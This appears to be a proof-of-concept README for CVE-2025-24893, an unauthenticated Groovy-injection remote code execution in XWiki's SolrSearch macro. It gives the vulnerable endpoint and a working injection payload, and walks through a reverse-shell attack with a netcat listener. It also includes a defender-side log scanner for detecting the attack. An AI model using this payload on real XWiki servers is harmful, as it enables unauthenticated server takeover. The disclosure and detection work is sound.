
CVE-2025-24893 PoC — XWiki Platform 安全漏洞

Related vulnerability
Title: XWiki Platform security vulnerability (CVE-2025-24893)
Description: XWiki Platform is XWiki's open-source wiki platform for building collaborative web applications. XWiki Platform contains a security vulnerability: any guest user can achieve remote code execution through a request to SolrSearch.
Description
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki (affecting versions before 15.10.11, 16.4.1 and 16.5.0RC1), caused by improper handling of Groovy expressions in the SolrSearch macro.
Introduction
# CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

> ⚠️ Unauthenticated Remote Code Execution in XWiki  
> 🛠️ PoC implementation by [@dollarboysushil](https://dollarboysushil.com)

## 💡 Overview

**CVE-2025-24893** is a critical RCE vulnerability in [XWiki](https://xwiki.org), caused by unsafe Groovy expression handling inside the `SolrSearch` macro. An attacker can inject Groovy code through a crafted GET request, leading to **remote code execution** (no authentication required).

- **Severity:** Critical (CVSS 9.8)
- **Affected:** versions before 15.10.11, 16.4.1 and 16.5.0RC1 (the first patched releases in each line)

---

## 🛠 Technical Breakdown

The vulnerability resides in the **`SolrSearch` macro** (`Main.SolrSearch`) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for **arbitrary code execution**.

### 🔥 Vulnerable Endpoint

```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
```

An attacker can inject Groovy code into the `text` parameter, which is evaluated server-side due to improper input handling within the macro system.

### 💥 Example Payload

```text
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
```

This leads to unauthenticated **Remote Code Execution (RCE)** on vulnerable XWiki instances.
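As an added defender-side example (not part of the original PoC repository or of XWiki itself), the following Python scans web-server access log lines for requests to the SolrSearch endpoint whose `text` parameter carries the `{{groovy}}` / `{{async}}` macro markers shown in the payload above. The sample log lines are constructed, the Groovy body in them is replaced by the word REDACTED, and the combined log format, field names and severity labels are assumptions; double percent-encoding is decoded so an encoded variant of the same markers is still visible.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Apache/nginx "combined" format). The first request
# carries the macro markers from the payload above with the Groovy body
# replaced by REDACTED; the other two are ordinary traffic.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7DREDACTED%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.6 - - [10/Mar/2025:12:00:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=meeting%20notes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2025:12:00:03 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined-log-format parser (assumed layout: client, ident, user, [time], "METHOD target HTTP/x", status).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Path of the vulnerable endpoint named above (the "get" action on Main.SolrSearch).
SOLRSEARCH_PATH = re.compile(r"/bin/get/Main/SolrSearch\b", re.IGNORECASE)
# Markers from the payload above: {{groovy}} is the code-execution macro, {{async}}
# the wrapper around it, and "}}}" is the verbatim-block escape that precedes them.
GROOVY_MARKER = re.compile(r"\{\{\s*groovy\b", re.IGNORECASE)
MACRO_SYNTAX = re.compile(r"\}\}\}|\{\{\s*/?\w+")


def deep_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded values are still visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target: str) -> Optional[dict]:
    """Classify one request target; returns a finding dict or None if nothing suspicious."""
    parts = urlsplit(target)
    if not SOLRSEARCH_PATH.search(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # parse_qs decodes once
    text = " ".join(deep_unquote(v) for v in params.get("text", []))
    if GROOVY_MARKER.search(text):
        severity = "high"      # Groovy macro in search text: matches the known exploit shape
    elif MACRO_SYNTAX.search(text):
        severity = "medium"    # other wiki-macro syntax where plain search terms are expected
    else:
        return None
    return {"severity": severity, "path": parts.path, "text": text[:200]}


def scan_access_log(log_text: str) -> list:
    """Run inspect_request over every parseable line and attach source, time and status."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        finding = inspect_request(m["target"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], method=m["method"], status=m["status"])
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"[{f['severity']}] {f['ts']} {f['ip']} {f['method']} {f['path']} text={f['text']!r}")
```

Matching on the decoded `text` value rather than on the raw URL is the point of the check: the macro braces arrive percent-encoded (sometimes twice), so a plain substring match on `{{groovy}}` in the raw log line would miss them. A 200 response to a flagged request does not by itself confirm execution; correlate with the XWiki version (patched from 15.10.11, 16.4.1 and 16.5.0RC1) and with outbound connections from the host at the same timestamp.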

### 🔬 Proof-of-Concept (PoC) Demonstration

#### 🧪 Target Environment

The vulnerable target is an XWiki instance running version `15.10.8`, which is affected by CVE-2025-24893.

![Vulnerable XWiki Interface](images/image.png)

---

#### 📡 Preparing the Listener

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:

```bash
nc -lvnp 1337
```

![Netcat Listener Active on Port 1337](images/image1.png)

---

#### 🚀 Launching the Exploit

Run the exploit script `CVE-2025-24893-dbs.py` to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

![Running Exploit Script](images/image2.png)

---

#### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Reverse Shell Acquired](images/image3.png)

---

### 📚 References

- OffSec Blog: [CVE-2025-24893 XWiki Groovy RCE](https://www.offsec.com/blog/cve-2025-24893/)
- NVD Entry: [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)